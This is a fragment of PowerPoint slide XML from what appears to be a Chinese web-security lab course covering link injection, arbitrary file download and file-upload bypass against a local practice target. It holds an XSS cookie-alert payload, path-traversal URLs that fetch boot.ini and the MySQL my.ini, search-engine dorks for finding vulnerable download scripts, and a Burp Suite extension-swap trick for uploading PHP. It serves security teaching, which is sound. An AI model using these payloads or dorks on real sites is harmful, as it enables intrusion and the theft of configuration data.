              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="801330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BF6CC1-EECA-4D95-95FC-365CE8165C4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111170" y="416690"/>
            <a:ext cx="10131425" cy="262184"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-14_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>链接注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B059B23-612E-484E-843D-EC43E49E1C5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="585355" y="1163784"/>
            <a:ext cx="11021290" cy="5555670"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>1. http://192.168.80.136/control/xss/link_xss.php?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>点击页面，并未发生什么变化</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://192.168.80.136/control/xss/link_xss.php?id=11222</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在页面上找到了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>11222</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>此时我们构造一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>herf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>标签 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;a  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=https://www.baidu.com &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>点我试试看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;/a&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3406417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79E1EF-42AF-44BD-B35A-A8DE238B67B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111170" y="416689"/>
            <a:ext cx="10131425" cy="386875"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>补充知识</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>任意文件下载</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0EBB0ED-F0DB-4AC2-B0D0-B5BDF3F7B1B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="263236" y="942109"/>
            <a:ext cx="11554691" cy="5708073"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>任意文件下载： 可参考 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.cnblogs.com/zhaijiahui/p/8459661.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>任意文件下载：在很多提供文件下载的模块，由于缺乏对下载的文件的限制，攻击者可以通过绝对路径对其服务器内部的文件或配置文件等进行下载读取。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>漏洞一般存在于有下载功能的地方。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>我们可以配合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>burpsuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>以及网站的报错绝对路径等信息进行尝试。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>goole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或百度：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>inurl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>readfile.php?file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>download.php?path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>    • </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>download.php?file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>    • </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>down.php?file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>    • </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>data.php?file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>    • </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>readfile.php?file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>    • </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>read.php?filename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>也可以使用字典等进行爆破的形式。</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793312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22C5C2-ED20-4E28-BA9A-C9C624B9DBD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030287" y="374072"/>
            <a:ext cx="10131425" cy="360219"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-15_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>任意文件下载</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{882B2B53-3DFA-40EB-8748-58D1C2AEF5F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685801" y="2142067"/>
            <a:ext cx="10661072" cy="3649133"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1. http://192.168.80.136/control/filedownload/file_download.php?file=template/assets/img/2.txt </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://192.168.80.136/control/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>filedownload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>file_download.php?file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>=template/../../../boot.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>下载看一下系统版本信息</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2595524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1D8CD3-21D8-4FBF-8B21-F841C1B3E51D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111170" y="416689"/>
            <a:ext cx="10131425" cy="442293"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-16_mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>配置文件下载</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E118941-238C-4C54-8959-E2655DB7F0D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="263237" y="1052945"/>
            <a:ext cx="11665528" cy="5388366"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://192.168.80.136/control/filedownload/ini_file_download.php?file=template/assets/img/1.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2. http://192.168.80.136/control/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>filedownload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ini_file_download.php?file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/my.ini</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31164633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69140E-00B1-4B61-AE43-0571DD10CE27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111170" y="416690"/>
            <a:ext cx="10131425" cy="414584"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>补充知识</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件上传漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB34A99B-5EBC-4733-8E3B-58E03196813E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412173" y="1495238"/>
            <a:ext cx="11367653" cy="4946072"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件上传漏洞是指由于程序员在对用户文件上传部分的控制不足或者处理缺陷，而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马，病毒，恶意脚本或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>WebShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等。这种攻击方式是最为直接和有效的，“文件上传”本身没有问题，有问题的是文件上传后，服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全，则会导致严重的后果。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>参考： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.jianshu.com/p/5ebba0482980</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>靶场：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>upload-labs  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/c0ny1/upload-labs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>后期也会录制专门的视频进行讲解</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17721213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0EB653-8ACD-4E06-97F6-8FA09A581F8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111170" y="416689"/>
            <a:ext cx="10131425" cy="442293"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-17_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件上传</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>前端拦截</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4492A252-8E00-44C9-9846-47874B741A5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="263237" y="1427018"/>
            <a:ext cx="11679382" cy="5223163"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>法一： 修改为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>burpsuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进行修改为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>法二：直接修改前端代码或者禁用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>js</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>火狐中输入： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>about:config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>搜索： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>javascript.enabled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的类型改为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>false  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用完之后记得改回来</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>将文件名称改为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>xx.php.jpg  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
